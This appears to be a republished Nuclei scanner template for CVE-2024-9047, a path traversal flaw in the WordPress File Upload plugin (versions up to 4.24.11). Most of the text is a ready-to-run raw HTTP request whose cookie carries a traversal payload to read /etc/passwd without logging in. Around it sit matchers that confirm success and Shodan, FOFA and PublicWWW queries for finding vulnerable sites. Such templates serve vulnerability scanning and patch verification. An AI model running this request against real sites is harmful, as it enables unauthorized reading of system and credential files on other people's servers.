The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
PoC代码[已公开]
id: CVE-2024-9047
info:
name: WordPress File Upload <= 4.24.11 - Arbitrary File Read
author: s4e-io,S9n3x
severity: critical
description: |
The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.
reference:
- https://github.com/iSee857/CVE-2024-9047-PoC
- https://nvd.nist.gov/vuln/detail/cve-2024-9047
- https://plugins.trac.wordpress.org/changeset/3164449/wp-file-upload
- https://www.wordfence.com/threat-intel/vulnerabilities/id/554a314c-9e8e-4691-9792-d086790ef40f?source=cve
- https://github.com/wy876/POC
- https://www.usom.gov.tr/bildirim/tr-24-1670
- https://sploitus.com/exploit?id=3358E6CC-BC63-56E4-A4C4-1F70903C34D5
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9047
cwe-id: CWE-22
epss-score: 0.93496
epss-percentile: 0.99812
metadata:
max-request: 1
vendor: nickolas_bossinas
product: wordpress-file-upload
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/wp-file-upload/"
fofa-query: body="/wp-content/plugins/wp-file-upload"
publicwww-query: /wp-content/plugins/wp-file-upload/
tags: cve,cve2024,wp,wordpress,wp-plugin,wp-file-upload,lfi,vkev,vuln
variables:
file: "{{rand_base(16)}}"
ticket: "{{rand_base(16)}}"
upload: "{{rand_base(32)}}"
upload_more: "{{rand_base(32)}}"
time: "{{rand_int(1000000000000, 9999999999999)}}"
http:
- raw:
- |
GET /wp-content/plugins/wp-file-upload/wfu_file_downloader.php?file={{file}}&ticket={{ticket}}&handler=dboption&session_legacy=1&dboption_base=cookies&dboption_useold=0&wfu_cookie=wp_wpfileupload_{{upload}} HTTP/1.1
Host: {{Hostname}}
Cookie: wp_wpfileupload_{{upload}}={{upload_more}}; wfu_storage_{{file}}=/../../../../../etc/passwd[[name]]; wfu_download_ticket_{{ticket}}={{time}}; wfu_ABSPATH=/;
matchers:
- type: dsl
dsl:
- 'contains(header, "filename=\"passwd")'
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition: and
# digest: 4a0a0047304502202b6a0a5db939431c369a1cf8dec5019bee7e2bc2c528d597576475a495bc3fe5022100c33f3712aeaf3303d15f92c9ee490326a44ab027a28082db15077d99e4700837:922c64590222798bb761d5b6d8e72950